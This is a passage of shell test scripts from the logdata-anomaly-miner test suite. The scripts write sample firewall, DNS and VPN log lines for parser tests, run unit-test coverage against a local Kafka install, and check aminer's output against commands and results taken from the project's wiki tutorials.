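  echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"52\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK FIN\"" > "$LOGFILE"
  echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******xx\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"153\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK PSH FIN\"" >> "$LOGFILE"
  ;;
DnsParsingModel)
  # These samples are written to "$LOGFILE" like every other branch. Without the
  # redirections they only went to stdout, so the aminer run below was fed whatever
  # the previous branch left in the file and this parser was never exercised.
  echo "Jan 20 11:21:42 dnsmasq[3326]: started, version 2.79 cachesize 150" > "$LOGFILE"
  echo "Jan 20 11:21:42 dnsmasq[3326]: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth nettlehash DNSSEC loop-detect inotify" >> "$LOGFILE"
  echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 8.8.8.8#53" >> "$LOGFILE"
  echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 192.168.230.122#53 for domain email-19.kennedy-mendoza.info" >> "$LOGFILE"
  echo "Jan 20 11:21:42 dnsmasq[3326]: read /etc/hosts - 7 addresses" >> "$LOGFILE"
  echo "Jan 20 11:21:55 dnsmasq[3414]: query[SRV] _http._tcp.archive.ubuntu.com from 192.168.230.4" >> "$LOGFILE"
  echo "Jan 20 11:21:55 dnsmasq[3414]: forwarded _http._tcp.archive.ubuntu.com to 8.8.8.8" >> "$LOGFILE"
  echo "Jan 20 11:21:55 dnsmasq[3414]: reply archive.ubuntu.com is 91.189.88.152" >> "$LOGFILE"
  echo "Jan 20 11:23:40 dnsmasq[3326]: cached debian.map.fastlydns.net is 199.232.138.132" >> "$LOGFILE"
  echo "Jan 20 11:21:42 inet-dns dnsmasq[1969]: exiting on receipt of SIGTERM" >> "$LOGFILE"
  echo "Jan 20 13:47:14 dnsmasq[3326]: nameserver 127.0.0.1 refused to do a recursive query" >> "$LOGFILE"
  echo "Jan 21 07:05:20 dnsmasq[3468]: failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory" >> "$LOGFILE"
  echo "Jan 24 03:56:53 dnsmasq[15084]: config version.bind is " >> "$LOGFILE"
  ;;
OpenVpnParsingModel)
  # Same fix as DnsParsingModel: the samples must land in "$LOGFILE", not on stdout.
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 TLS: soft reset sec=3308/3308 bytes=45748/-1 pkts=649/0" > "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY OK: depth=1, C=AT, ST=Vienna, L=Vienna, O=Some Organisation GmbH, CN=OpenVPN CA, emailAddress=admin@organisation.cyberrange.at" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY KU OK" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Validating certificate extended key usage" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_VER=2.4.4" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PLAT=linux" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PROTO=2" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_LZ4=1" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_COMP_STUB=1" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_TCPNL=1" >> "$LOGFILE"
  echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key" >> "$LOGFILE"
  echo "2022-01-21 03:49:44 jhall/192.168.230.165:46011 TLS: soft reset sec=3309/3308 bytes=45892/-1 pkts=651/0" >> "$LOGFILE"
  echo "2022-01-21 06:30:01 192.168.230.95:60795 TLS: Initial packet from [AF_INET]192.168.230.95:60795, sid=30d47335 8140d551" >> "$LOGFILE"
  echo "2022-01-21 06:30:01 192.168.230.95:60795 peer info: IV_NCP=2" >> "$LOGFILE"
  echo "2022-01-21 06:30:01 192.168.230.95:60795 [twhite] Peer Connection Initiated with [AF_INET]192.168.230.95:60795" >> "$LOGFILE"
  echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI_sva: pool returned IPv4=10.9.0.6, IPv6=(Not enabled)" >> "$LOGFILE"
  echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: Learn: 10.9.0.6 -> twhite/192.168.230.95:60795" >> "$LOGFILE"
  echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: primary virtual IP for twhite/192.168.230.95:60795: 10.9.0.6" >> "$LOGFILE"
  echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 PUSH: Received control message: 'PUSH_REQUEST'" >> "$LOGFILE"
  echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 SENT CONTROL [twhite]: 'PUSH_REPLY,redirect-gateway def1,block-outside-dns,route 10.9.0.1,topology net30,ping 10,ping-restart 120,ifconfig 10.9.0.6 10.9.0.5,peer-id 0,cipher AES-256-CBC' (status=1)" >> "$LOGFILE"
  echo "2022-01-21 08:09:33 jhall/192.168.230.165:46011 [jhall] Inactivity timeout (--ping-restart), restarting" >> "$LOGFILE"
  echo "2022-01-21 08:09:33 jhall/192.168.230.165:46011 SIGUSR1[soft,ping-restart] received, client-instance restarting" >> "$LOGFILE"
  echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)" >> "$LOGFILE"
  echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS handshake failed" >> "$LOGFILE"
  echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS: move_session: dest=TM_LAME_DUCK src=TM_ACTIVE reinit_src=1" >> "$LOGFILE"
  ;;
*)
  # Every parser model shipped with aminer needs a sample branch here.
  echo "Unknown parser config '$BN' was found! Please extend these tests. Failing.."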
exit_code=2 continue ;; esac cat >> $CONFIG_PATH < $OUT 2>&1 exit_code=$? if [[ `grep -ic "VerboseUnparsedAtomHandler" $OUT` != 0 && $BN != "AminerParsingModel" ]] || [[ `grep -o '\bVerboseUnparsedAtomHandler\b' $OUT | wc -l` > 5 ]] || `grep -Fq "Traceback" $OUT` || `grep -Fq "{'Parser'" $OUT` || `grep -Fq "FATAL" $OUT` || `grep -Fq "Config-Error" $OUT`; then echo "Failed Test in $filename" exit_code=1 cat $OUT echo echo fi done rm $CONFIG_PATH exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runCoverageTests.sh000077500000000000000000000022351437606560100246510ustar00rootroot00000000000000source config curl $KAFKA_URL --output kafka.tgz tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 1 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sudo coverage run --source=./aminer -m unittest discover -s unit -p '*Test.py' > /dev/null exit_code1=$? touch /tmp/report echo 'Statement Coverage:' > /tmp/report sudo coverage report >> /tmp/report sudo coverage run --source=./aminer --branch -m unittest discover -s unit -p '*Test.py' > /dev/null exit_code2=$? echo 'Branch Coverage:' >> /tmp/report sudo coverage report >> /tmp/report cat /tmp/report rm /tmp/report test -e /var/mail/mail && sudo rm -f /var/mail/mail sudo rm /tmp/test4unixSocket.sock sudo rm /tmp/test5unixSocket.sock sudo rm /tmp/test6unixSocket.sock $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs if [[ "$exit_code1" -ne 0 || "$exit_code2" -ne 0 ]]; then exit 1 fi exit 0 logdata-anomaly-miner-2.6.1/aecid-testsuite/runElasticSearchWikiTest.sh000077500000000000000000000050401437606560100262660ustar00rootroot00000000000000#!/bin/bash . 
./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write second line of 3rd to 4th ``` into LOG. # 2.) Write the config to CFG_PATH from 1st ```yaml to 5th ```. # 3.) Replace LogResourceList path with LOG in CFG_PATH and the report interval of the ParserCount. # 4.) Extract the CMD between 10th and 11th ``` # 5.) Compare the results with the outputs between between 12th and 13th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT=logdata-anomaly-miner.wiki/Importing-logs-via-ElasticSearch-interface.md OUT=/tmp/out.txt LOG=/tmp/access.log CFG_PATH=/etc/aminer/config.yml TMPFILE1=/tmp/tmpfile1 TMPFILE2=/tmp/tmpfile2 # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. exit_code=0 # write log data into file (1.) awk '/^```$/ && ++n == 3, /^```$/ && n++ == 4' < $INPUT | sed '/^```/ d' > $LOG sed -i '1d' $LOG # write the config to CFG_PATH (2.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (3.) sed "s?unix:///var/lib/aelastic/aminer.sock?file:///${LOG}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null sed "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # extract CMD (4.) awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(cat $OUT) # compare results (5.) 
IN=$(awk '/^```$/ && ++n == 12, /^```$/ && n++ == 13' < $INPUT | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE2 fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then cat $TMPFILE1 echo echo "Failed Test in 5." echo cat $TMPFILE2 fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 rm $OUT rm $LOG sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runGettingStarted.sh000077500000000000000000000165171437606560100250330ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the first log line between the 4th and 5th ``` in the third line and save it to /var/log/apache2/access.log # 2.) Link the ApacheAccessLog by running the command between the 5th ```bash and 7th ``` after "$ ". # 3.) Extract the first aminer command and the CFG_PATH between 9th and 10th ```. # 4.) Write the config to CFG_PATH from 1st ```yaml to 8th ```. # 5.) Extract the resulting outputs between 9th and 10th ``` by comparing following lines with the ones from the output: # - 6,34 with 2,30 # - 37,39 with 37,39 # 6.) Compare the outputs between 9th and 10th ``` and the outputs between 19th and 20th ```. # 7.) Write the config to CFG_PATH from 2nd ```yaml to 11th ```. # 8.) Read 1st ```python to 14th ``` and compare the ApacheAccessModel with the ApacheAccessModel in source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py # 9.) Write new lines to the access.log from the 4th and 5th line between 21st and 22nd ```. # 10.) 
Read the new command without clearing the persisted data from the 2nd line between 23rd and 24th ```. Run the command and compare the lines 4,32 with the output lines 2,30. # 11.) Read all log lines between the 27th and 28th ``` and save it to /var/log/apache2/access.log # 12.) Extract the resulting outputs and CFG_PATH (1st line) between 30th and 31st ``` by comparing following lines with the ones from the output: # - 4,32 with 2,30 # - 35,37 with 33,35 # - 40,42 with 38,40 # - 45,47 with 43,45 # - 50,52 with 48,50 # - 55,57 with 53,55 # - 60,62 with 58,60 # 13.) Write the config to CFG_PATH from 5th ```yaml to 29th ```. # 14.) Set LearnMode to False. # 15.) Parse the last CMD between 34th and 35th ```. # 16.) Append the new logline and extract the resulting outputs between 40th and 41st ``` by comparing following lines with the ones from the output: # - 4,6 with 2,4 ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md OUT=/tmp/out.txt OUT2=/tmp/out2.txt LOG=/tmp/access.log # extract the file from the development branch of the wiki project. # the first ```yaml script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. sed -i "s?/var/log/apache2/access.log?/tmp/access.log?g" $INPUT_FILE # create log file (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE > $LOG sed -i -n '3p' $LOG # link the ApacheAccessModel (2.) awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } $CMD 2> /dev/null # load the aminer command. (3.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '4p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} # write the yaml config. (4.) 
awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # extract resulting outputs and compare them. (5.) OUT1=$(sed -n '6,34p' < $OUT) OUT2=$(sed -n '37,39p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,37p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 5." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 5." exit_code=$((exit_code | $?)) # compare the outputs (6.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT OUT1=$(sed -n '5,$p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE > $OUT OUT2=$(sed -n '2,$p' < $OUT) compareStrings "$OUT1" "$OUT2" "Failed Test in 6." exit_code=$((exit_code | $?)) # write the second yaml config (7.) awk '/^```yaml$/ && ++n == 2, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # compare ApacheAccessModel (8.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # write new loglines. (9.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE > $LOG OUT1=$(sed -n '4,5p' < $LOG) echo "$OUT1" > $LOG # read new command (10.) awk '/^```$/ && ++n == 23, /^```$/ && n++ == 24' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 10." exit_code=$((exit_code | $?)) # rewrite access.log (11.) 
awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $LOG # extract resulting outputs and CFG_PATH and compare them. (12.) awk '/^```$/ && ++n == 30, /^```$/ && n++ == 31' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} OUT1=$(sed -n '4,32p' < $OUT) OUT2=$(sed -n '35,37p' < $OUT) OUT3=$(sed -n '40,42p' < $OUT) OUT4=$(sed -n '45,47p' < $OUT) OUT5=$(sed -n '50,52p' < $OUT) OUT6=$(sed -n '55,57p' < $OUT) OUT7=$(sed -n '60,62p' < $OUT) # test the fifth yaml config. (13.) awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,35p' < $OUT) IN3=$(sed -n '38,40p' < $OUT) IN4=$(sed -n '43,45p' < $OUT) IN5=$(sed -n '48,50p' < $OUT) IN6=$(sed -n '53,55p' < $OUT) IN7=$(sed -n '58,60p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT3" "$IN3" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT4" "$IN4" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT5" "$IN5" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT6" "$IN6" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT7" "$IN7" "Failed Test in 13." exit_code=$((exit_code | $?)) # set LearnModel to False. (14.) sudo sed -i 's/LearnMode: True/LearnMode: False/g' $CFG_PATH # read new command (15.) awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } # extract logline and resulting outputs and compare them. (16.) 
awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT_FILE > $OUT OUT1=$(sed -n '6p' < $OUT) OUT1=$(echo "$OUT1" | sed "s/b'//g") OUT1=$(echo "$OUT1" | sed "s/'//g") echo "$OUT1" >> $LOG OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 16." exit_code=$((exit_code | $?)) sudo rm -r logdata-anomaly-miner.wiki rm $OUT sudo rm $CFG_PATH exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToCreateYourOwnFrequencyDetector.sh000077500000000000000000000257611437606560100312070ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 1st and 2nd ``` and save it to /tmp/access.log (LOG) # 2.) Read 1st ```python and 3rd ``` and write the FrequencyDetector to ../source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py # 3.) Check if the parameter definitions between 4th and 5th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # (each line on its own) # 4.) Add the FrequencyDetector parameters between 6th and 7th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 5.) Add the code between 2nd ```python and 8th ``` to the ../source/root/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py # 6.) Write the config to CFG_PATH from 1st ```yaml to 9th ``` and replace LogResourceList to LOG. # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. # 8.) Compare the outputs with the ones between 11th and 12th ```. # 9.) 
Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the CFG_PATH # 10.) Remove lines 36-38 in the $FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. # 13.) Run CMD and compare the output to the one between 18th and 19th ```. # 14.) Remove the previously added lines and add the lines between 6th ```python and 20th ```. # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. # 18.) Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. # 20.) Add lines between 9th ```python and 27th ```. 
################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py FREQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py TMP_FREQ_DET=/tmp/FrequencyDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. cp /home/user/Documents/HowTo-Create-your-own-FrequencyDetector.md logdata-anomaly-miner.wiki/ # create log file (1.) awk '/^```$/ && ++n == 1, /^```$/ && n++ == 2' < $INPUT | sed '/^```/ d' > $LOG # 2.) create FrequencyDetector awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 3.) compare parameter definitions with AnalysisNormalisationSchema awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi LINE=$(sed -n '3p' < $OUT) if ! 
fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi # 4.) Add the FrequencyDetector parameters to the AnalysisValidationSchema sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 5.) Add code to the YamlConfig.py # create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 6.) Write the config to CFG_PATH and replace LogResourceList to LOG. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null sudo sed -i 's?file:///home/ubuntu/apache.log?file:///tmp/access.log?g' $CFG_PATH # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. awk '/^```bash$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '2p' < $OUT) CMD="sudo ${CMD#* } --config $CFG_PATH" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$? # 8.) Compare the outputs with the ones between 11th and 12th ```. OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 11, /^```$/ && n++ == 12' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # 9.) Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the FREQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "23 i \ $IN1" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 10.) 
Remove lines 36-38 in the FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. sed -i -e "35,38d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 18 $OUT) awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. tac $TMP_FREQ_DET | sed '1,13d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET # 13.) Run CMD and compare the output to the one between 18th and 19th ```. sed -i "23 i \ self.counts = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) # 14.) Remove the previously added lines and add the lines between 6th ```python and 20th ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,14d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;23d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. 
